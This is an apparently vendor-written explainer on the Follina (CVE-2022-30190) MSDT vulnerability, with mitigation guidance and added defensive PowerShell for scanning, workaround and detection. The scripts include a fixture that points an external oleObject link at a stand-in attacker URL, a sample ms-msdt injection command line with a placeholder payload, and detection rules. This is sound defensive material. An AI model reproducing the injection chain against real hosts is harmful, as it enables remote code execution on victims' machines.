CVE-2022-30190 (Follina): Exploiting MSDT via Macro-less Word Docs for RCE

By: Cymulate

Last Updated: December 12, 2024

Rated 7.8 (High) on the CVSS 3.x base score scale, CVE-2022-30190 (Follina) abuses the Microsoft Support Diagnostic Tool (MSDT), a diagnostic component built into Windows. Although Microsoft's advisory was published on May 30, 2022, exploitation was observed in the wild as early as April 2022. Microsoft initially dismissed a report from the Crazyman_Army research team, which had identified a zero-day RCE vulnerability in the product; the submission, tracked as VULN-065524, was closed and incorrectly classified as "fixed." The research team nao_sec was credited with uncovering the vulnerability, which it found while searching VirusTotal for files exploiting CVE-2021-40444 (the earlier MSHTML vulnerability). Public disclosure occurred on May 27, 2022, followed by Microsoft's mitigation guidance on May 30, 2022.

How CVE-2022-30190 (Follina) Exploits MSDT

Anyone can launch the Microsoft Support Diagnostic Tool (MSDT) from the Start Menu by typing "MSDT" in the search bar. The opening dialog asks for a passkey, which is normally supplied by a Microsoft support professional. The tool also registers the ms-msdt: URL protocol handler so that diagnostic packages can be launched from a link. Follina abuses that handler: a crafted ms-msdt: URL invokes the PCWDiagnostic troubleshooting pack and smuggles PowerShell into its IT_BrowseForFile parameter, which MSDT failed to sanitize, so the attacker's code runs with the privileges of the calling application and user. That opens the door to malicious actions such as:
  • Running malware.
  • Installing unauthorized programs.
  • Altering or deleting data.
  • Creating new accounts with the victim’s permissions.
The Follina vulnerability lets an attacker trigger MSDT from a .docx or .rtf document without macros. The document carries an external OLE object relationship that fetches a remote HTML file, and script in that file navigates to the ms-msdt: URL. Protected View stops the .docx variant, but an .rtf copy of the same document can fire from the Windows Explorer preview pane, so the victim does not even have to open the file.
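The external relationship described above is the one static artefact a defender can look for before a document is ever opened. The following PowerShell is an added example, not code from the original post or from Cymulate: it builds a constructed, minimal .docx in the temp directory whose word/_rels/document.xml.rels carries an external oleObject link (the URL is a placeholder, not a real indicator), then scans every .rels part in the package and reports relationships marked TargetMode="External", flagging those that point at a remote http(s) or UNC target.

```powershell
# Added example (not from the original post): list external relationships in a .docx package.
Add-Type -AssemblyName System.IO.Compression
Add-Type -AssemblyName System.IO.Compression.FileSystem

function Find-ExternalRelationships {
    param([Parameter(Mandatory)][string]$Path)
    $findings = @()
    $zip = [System.IO.Compression.ZipFile]::OpenRead($Path)
    try {
        foreach ($entry in $zip.Entries) {
            # Relationship parts live under _rels/ and word/_rels/ and always end in .rels
            if ($entry.FullName -notlike '*.rels') { continue }
            $reader = New-Object System.IO.StreamReader($entry.Open())
            try { [xml]$rels = $reader.ReadToEnd() } finally { $reader.Dispose() }
            foreach ($r in $rels.Relationships.Relationship) {
                if ($r.TargetMode -ne 'External') { continue }
                $findings += [pscustomobject]@{
                    Part   = $entry.FullName
                    Type   = ($r.Type -split '/')[-1]      # e.g. oleObject, hyperlink, attachedTemplate
                    Target = $r.Target
                    Remote = ($r.Target -match '^(https?:|\\\\)') # http(s) URL or UNC path
                }
            }
        }
    } finally { $zip.Dispose() }
    return $findings
}

# Constructed sample document: only the relationships part matters for this check.
# The Target URL is a placeholder, not an indicator from any real Follina sample.
$sample = Join-Path $env:TEMP 'follina-relationship-sample.docx'
if (Test-Path $sample) { Remove-Item $sample }
$archive = [System.IO.Compression.ZipFile]::Open($sample, 'Create')
try {
    $entry  = $archive.CreateEntry('word/_rels/document.xml.rels')
    $writer = New-Object System.IO.StreamWriter($entry.Open())
    try {
        $writer.Write(@'
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://attacker.example/payload.html!" TargetMode="External"/>
</Relationships>
'@)
    } finally { $writer.Dispose() }
} finally { $archive.Dispose() }

# Only rId2 is reported: it is external and its target is a remote URL.
Find-ExternalRelationships -Path $sample | Format-Table -AutoSize
Remove-Item $sample
```

Run the scan against real mail attachments by pointing -Path at the file; .docm, .xlsx and .pptx are the same package format, so the function works on them unchanged. An external oleObject or attachedTemplate relationship with a remote target is not proof of Follina on its own, but it is the hook both Follina and the earlier CVE-2021-40444 documents relied on, and it is rare in legitimate business documents.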

Impacted Systems

CVE-2022-30190 has been confirmed in Office 2013, 2016, 2019 and 2021, Office ProPlus, and Microsoft 365 Apps (Office 365). The flaw itself is in MSDT, a Windows component, so every supported Windows client and server version is affected regardless of the Office build. Because an exploit can be triggered simply by the target opening (or previewing) a Word document, any user who can receive a file is a potential victim until the workarounds published by the Microsoft Security Response Center have been applied and, most importantly, fully validated.

Mitigation Steps Published by Microsoft

Microsoft's guidance recommends disabling the MSDT URL protocol, which removes the handler the exploit depends on: from an elevated command prompt, export (back up) the HKEY_CLASSES_ROOT\ms-msdt registry key with reg.exe, delete it, and re-import the backup later to restore the handler. Microsoft Defender for Endpoint customers can additionally enable the attack surface reduction rule "Block all Office applications from creating child processes", which breaks the Office-to-msdt.exe chain. Microsoft fixed the underlying flaw in the June 14, 2022 Windows security updates, so the workaround is only needed on hosts that have not yet installed them, and should be reverted once they have.
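The workaround above is three reg.exe commands, but at scale the parts that matter are the backup, the verification that the handler is really gone, and a clean way to undo it after patching. The following PowerShell is an added example, not Microsoft's own script: it wraps the MSRC steps in functions, checks for elevation, refuses to delete without a successful export, confirms the handler's shell command no longer resolves, and adds the Defender ASR rule as defence in depth. The backup location in $BackupPath is an assumption; any path the administrator can write to works.

```powershell
# Added example (not Microsoft's script): apply, verify and undo the MSRC workaround
# for CVE-2022-30190 by removing the ms-msdt: URL protocol handler. Run elevated.
$BackupPath = Join-Path $env:SystemDrive 'ms-msdt-backup.reg'   # assumption: any writable path works
$HandlerKey = 'HKEY_CLASSES_ROOT\ms-msdt'

function Test-Elevated {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    return ([Security.Principal.WindowsPrincipal]$id).IsInRole(
        [Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Get-MsdtHandlerCommand {
    # The command the shell runs for an ms-msdt: URL; $null means the handler is gone.
    $cmdKey = "Registry::$HandlerKey\shell\open\command"
    if (-not (Test-Path $cmdKey)) { return $null }
    return (Get-ItemProperty -Path $cmdKey).'(default)'
}

function Disable-MsdtProtocol {
    if (-not (Test-Elevated)) { throw 'Run this from an elevated PowerShell session.' }
    if (-not (Test-Path "Registry::$HandlerKey")) {
        Write-Host "$HandlerKey is already absent; nothing to do."
        return
    }
    # Export first so the handler can be restored after the June 2022 update is installed.
    reg.exe export $HandlerKey $BackupPath /y | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "reg export failed with exit code $LASTEXITCODE; not deleting." }
    reg.exe delete $HandlerKey /f | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "reg delete failed with exit code $LASTEXITCODE." }
    # Verify: the shell\open\command subkey must no longer resolve.
    if ($null -ne (Get-MsdtHandlerCommand)) { throw 'Handler still present after delete; inspect manually.' }
    Write-Host "ms-msdt: handler removed; backup written to $BackupPath"
}

function Restore-MsdtProtocol {
    if (-not (Test-Elevated)) { throw 'Run this from an elevated PowerShell session.' }
    if (-not (Test-Path $BackupPath)) { throw "No backup found at $BackupPath" }
    reg.exe import $BackupPath | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "reg import failed with exit code $LASTEXITCODE." }
    Write-Host "ms-msdt: handler restored: $(Get-MsdtHandlerCommand)"
}

function Enable-OfficeChildProcessBlock {
    # Defence in depth from the same MSRC guidance: Defender ASR rule
    # "Block all Office applications from creating child processes".
    Add-MpPreference -AttackSurfaceReductionRules_Ids 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' `
                     -AttackSurfaceReductionRules_Actions Enabled
}

# Show the current state; the operator then calls Disable-MsdtProtocol,
# and Restore-MsdtProtocol once the host is patched.
Write-Host "Current ms-msdt: handler command: $(Get-MsdtHandlerCommand)"
```

Get-MsdtHandlerCommand doubles as the validation step the article calls for: on an unmitigated host it returns the msdt.exe command line registered for the protocol, and after Disable-MsdtProtocol it returns nothing. Keep the exported .reg file with the change record, because Restore-MsdtProtocol is the only clean way to bring Windows troubleshooters back after the June 2022 update is deployed.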

Testing for CVE-2022-30190 Vulnerability

A PoC for testing the Follina Office RCE locally is available on GitHub ("Follina RCE Usage Script"). Running it produces these results:
[Screenshot: output of the Follina RCE usage script]
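Running the PoC tells you whether a host executes the chain; a defender also wants to confirm that the attempt is visible in process-creation telemetry. The following PowerShell is an added example, not code from the original post or from Cymulate's kit: it runs three Follina-specific rules over constructed process-creation records shaped like Sysmon Event ID 1 / Windows 4688 fields (Image, ParentImage, CommandLine). The records are made up for the example, the Office install path is a typical one, and the injected payload and URL are placeholders rather than content from any real sample.

```powershell
# Added example (not from the original post): detect the Follina execution chain in
# process-creation records. Sample events below are constructed, not real telemetry.
$SampleEvents = @(
    [pscustomobject]@{   # benign: a user launching a troubleshooter from Explorer
        Image       = 'C:\Windows\System32\msdt.exe'
        ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = '"C:\Windows\System32\msdt.exe" -id NetworkDiagnosticsWeb'
    },
    [pscustomobject]@{   # Follina: Word invoking the ms-msdt: handler with an injected subexpression
        Image       = 'C:\Windows\System32\msdt.exe'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        CommandLine = '"C:\Windows\System32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression(<placeholder>))"'
    },
    [pscustomobject]@{   # Follina: the troubleshooter host running the smuggled PowerShell
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\System32\sdiagnhost.exe'
        CommandLine = 'powershell.exe -NoProfile -Command <placeholder>'
    }
)

$OfficeApps = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE', 'MSACCESS.EXE'

function Find-FollinaActivity {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $image   = [System.IO.Path]::GetFileName($e.Image)
        $parent  = [System.IO.Path]::GetFileName($e.ParentImage)
        $reasons = @()

        # Rule 1: msdt.exe spawned directly by an Office application.
        if ($image -ieq 'msdt.exe' -and $OfficeApps -contains $parent) {
            $reasons += 'msdt.exe spawned by Office process'
        }
        # Rule 2: ms-msdt: URL whose IT_BrowseForFile value carries a PowerShell subexpression.
        if ($e.CommandLine -match '(?i)ms-msdt:.*IT_BrowseForFile=.*\$\(') {
            $reasons += 'ms-msdt: URL with $( ) subexpression in IT_BrowseForFile'
        }
        # Rule 3: the troubleshooter host (sdiagnhost.exe) launching a command shell.
        if ($parent -ieq 'sdiagnhost.exe' -and $image -imatch '^(powershell|pwsh|cmd)\.exe$') {
            $reasons += 'sdiagnhost.exe launched a command shell'
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Image   = $image
                Parent  = $parent
                Reasons = ($reasons -join '; ')
            }
        }
    }
}

# The first record is benign and produces nothing; the second matches rules 1 and 2,
# the third matches rule 3.
Find-FollinaActivity -Events $SampleEvents | Format-Table -AutoSize
```

Rules 1 and 2 are high confidence: Office has no legitimate reason to start msdt.exe, and a $( ) subexpression inside IT_BrowseForFile is the injection itself. Rule 3 is lower confidence because some built-in troubleshooters do spawn helper processes under sdiagnhost.exe, so treat it as a correlation signal and pair it with rule 1 from the same host. The same three conditions translate directly into a SIEM query once the field names are mapped to your schema.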

Cymulate’s Response to Follina

By June 2, Cymulate users could access a dedicated purple team scenario to validate their defenses against CVE-2022-30190. An Immediate Threat Intelligence Kit for Follina was published on June 1, enabling users to test their environments. Additionally, Cymulate users can:
  • Update their SIEM signature bank with multiple IoCs.
  • Expand the breadth of purple team scenario validations to include Follina-specific exploits.

Validate Your Environment Today

Protect your organization by testing your exposure to CVE-2022-30190 with Cymulate’s comprehensive security validation tools. Start validating against this immediate threat now and ensure your defenses are resilient.